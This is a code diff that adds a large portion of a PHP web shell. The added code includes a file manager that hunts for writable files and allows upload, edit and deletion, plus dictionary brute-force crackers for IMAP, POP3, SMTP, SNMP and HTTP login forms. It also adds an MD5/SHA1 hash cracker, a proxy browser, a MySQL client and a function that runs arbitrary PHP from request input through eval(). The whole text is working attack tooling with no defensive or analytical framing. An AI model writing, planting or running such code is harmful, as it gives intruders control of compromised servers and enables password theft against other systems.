+function listdiR($cwd,$task){
+$c= getcwd();
+$dh = opendir($cwd);
+while ($cont=readdir($dh)){
+if($cont=='.' || $cont=='..')continue;
+$adr = $cwd.DIRECTORY_SEPARATOR.$cont;
+switch ($task){
+case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '2':if(is_file($adr) &&  is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
+case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
+case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
+case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
+}
+if (is_dir($adr)) listdiR($adr,$_REQUEST['task']);
+}
+}
+if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}}
+if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}}
+function filemanager(){
+global $windows,$msgbox,$errorbox,$t,$et,$hcwd;
+$cwd= getcwd();
+$table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">";
+$td1n="<td width=\"22%\" bgcolor=\"#666666\">";
+$td2m="<td width=\"22%\" bgcolor=\"#808080\">";
+$td1i="<td width=\"5%\" bgcolor=\"#666666\">";
+$td2i="<td width=\"5%\" bgcolor=\"#808080\">";
+$tdnr="<td width=\"22%\" bgcolor=\"#800000\">";
+$tdw="<td width=\"22%\" bgcolor=\"#006E00\">";
+if (!empty($_REQUEST['task'])){
+if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
+if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
+echo "<font color=blue><pre>";
+listdiR($cwd,$_REQUEST['task']);
+echo "</pre></font>";
+}else{
+if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){
+if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
+$title="Destination";
+$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
+$dis =(!empty($_REQUEST['cP']))?'Copy':'Move';
+}else{
+$ad = $_REQUEST['rN'];
+$title ="New name";
+$dis = "Rename";
+}
+if (!!empty($_REQUEST['deS'])){
+echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>";
+}else{
+if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']);
+else{
+copy($ad,$_REQUEST['deS']);
+if (!empty($_REQUEST['mV']))unlink($ad);
+}
+}
+}
+if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) {
+$dh = opendir($_REQUEST['deL']);
+$d="";
+while ($cont=readdir($dh)){$d++;}
+if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}}
+if (!empty($_FILES['uploadfile'])){
+move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
+echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
+}
+$select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\"";
+if (!empty($_REQUEST['newf'])){
+if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");}
+if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
+}
+if ($windows){
+echo "$table<td><b>Drives:</b> ";
+for ($i=66;$i<=90;$i++){$drive= chr($i).':';
+if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
+}
+echo $et;
+}
+echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>";
+$file=array();$dir=array();$link=array();
+if($dirhandle = opendir($cwd)){
+while ($cont=readdir($dirhandle)){
+if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont;
+elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont;
+else $link[]=$cont;
+}
+closedir($dirhandle);
+sort($file);sort($dir);sort($link);
+echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>";
+$i=0;
+foreach($dir as $dn){
+echo "<tr>";
+$i++;
+$own="Unknow";
+$owner=posix_getpwuid(fileowner($dn));
+$mdate=date("Y/m/d H:i:s",filemtime($dn));
+$adate=date("Y/m/d H:i:s",fileatime($dn));
+$diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>";
+if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">";
+if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>";
+echo "$cl1------</td>";
+echo $cl2.$diraction;
+echo "</tr>" ;
+flusheR();
+}
+foreach($file as $fn){
+echo "<tr>";
+$i++;
+$own = "Unknow";
+$owner = posix_getpwuid(fileowner($fn));
+$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>";
+$mdate = date("Y/m/d H:i:s",filemtime($fn));
+$adate = date("Y/m/d H:i:s",fileatime($fn));
+if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+$size = showsizE(filesize($fn));
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">";
+if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>";
+echo "$cl1$size</td>";
+echo $td2m.$fileaction;
+echo "</tr>" ;
+flusheR();
+}
+foreach($link as $ln){
+$own = "Unknow";
+$i++;
+$owner = posix_getpwuid(fileowner($ln));
+$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>";
+$mdate = date("Y/m/d H:i:s",filemtime($ln));
+$adate = date("Y/m/d H:i:s",fileatime($ln));
+if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+echo "<tr>";
+$size = showsizE(filesize($ln));
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">";
+if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>";
+echo "$cl1$size</td>";
+echo $cl2.$linkaction;
+echo "</tr>" ;
+flusheR();
+}
+}
+$dc = count($dir)-2;
+if($dc==-2)$dc=0;
+$fc = count($file);
+$lc = count($link);
+$total = $dc + $fc + $lc;
+echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b>   Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et";
+}
+}
+function imaplogiN($host,$username,$password){
+$sock=fsockopen($host,143,$n,$s,5);
+$b=namE();
+$l=strlen($b);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,"$b LOGIN $username $password\r\n");
+$res=fgets($sock,$l+4);
+if ($res == "$b OK")return 1;else return 0;
+fclose($sock);
+}
+function pop3logiN($server,$user,$pass){
+$sock=fsockopen($server,110,$en,$es,5);
+if(!$sock)return -1;
+fread($sock,1024);
+fwrite($sock,"user $user\n");
+$r=fgets($sock);
+if($r{0}=='-')return 0;
+fwrite($sock,"pass $pass\n");
+$r=fgets($sock);
+fclose($sock);
+if($r{0}=='+')return 1;
+return 0;
+}
+function imapcrackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$imap=imaplogiN($target,$user,$pass);
+if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
+if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}IMAP cracker:$crack";
+}
+function snmpcrackeR(){
+global $t,$et,$errorbox,$crack,$hcwd;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+$com=trim(fgets($dictionary)," \n\r");
+$res=snmpchecK($target,$com,2);
+if($res)echo "$com<br>";
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function pop3crackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$pop3=pop3logiN($target,$user,$pass);
+if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
+if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}POP3 cracker:$crack";
+}
+function smtpcrackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$smtp=smtplogiN($target,$user,$pass,5);
+if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
+if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}SMTP cracker:$crack";
+}
+function formcrackeR(){
+global $errorbox,$footer,$et,$hcwd;
+if(!empty($_REQUEST['start'])){
+$url=$_REQUEST['target'];
+$uf=$_REQUEST['userf'];
+$pf=$_REQUEST['passf'];
+$sf=$_REQUEST['submitf'];
+$sv=$_REQUEST['submitv'];
+$method=$_REQUEST['method'];
+$fail=$_REQUEST['fail'];
+$dic=$_REQUEST['dictionary'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
+$dictionary=fopen($dic,'r');
+echo "<font color=blue>Cracking started...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$url.="?$uf=$user&$pf=$pass&$sf=$sv";
+$res=check_urL($url,$method,$fail,12);
+if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
+flusheR();
+}
+fclose($dictionary);
+echo "Done!</font><br>";
+}
+else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
+}
+function hashcrackeR(){
+global $errorbox,$t,$et,$hcwd;
+if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+$hash=strtoupper($_REQUEST['hash']);
+echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
+$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
+while(!feof($dictionary)){
+$word=trim(fgets($dictionary)," \n\r");
+if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
+}
+echo "Done!</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function pr0xy(){
+global $errorbox,$et,$footer,$hcwd;
+echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
+if (!empty($_REQUEST['urL'])){
+$dir="";
+$u=parse_url($_REQUEST['urL']);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
+$url=@fsockopen($host, 80, $errno, $errstr, 12);
+if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
+fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+while(!feof($url)){
+$con = fgets($url);
+$con = str_replace("href=mailto","HrEf=mailto",$con);
+$con = str_replace("HREF=mailto","HrEf=mailto",$con);
+$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
+$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
+$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
+$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
+$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+echo $con;
+}
+fclose($url);
+}
+}
+function mysqlclienT(){
+global $t,$errorbox,$et,$hcwd;
+if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
+$server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
+if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB'];
+$link = @mysql_connect($server,$user,$pass);
+if($link){
+if (!empty($db))mysql_select_db($db);
+$result=mysql_query($query,$link);
+echo "${t}Query result(s):$et";
+echo "<font color=blue><pre>";
+while($data=mysql_fetch_row($result)){
+foreach($data as $v) {
+echo $v;
+echo "\t";
+}
+echo "\n";
+}
+echo "</pre></font>";
+mysql_close($link);
+}
+else{
+echo "$errorbox Login failed!$et<br>";
+}
+}
+echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>";
+}
+function phpevaL(){
+global $t,$hcwd;
+if (!empty($_REQUEST['code'])){
+echo "<center><textarea rows=\"10\" cols=\"64\">";
+$code = str_replace("<?php","",$_REQUEST['code']);
+$code = str_replace("<?","",$code);
+$code = str_replace("?>","",$code);
+htmlspecialchars(eval($code));
+echo "</textarea></center><br>";
+}
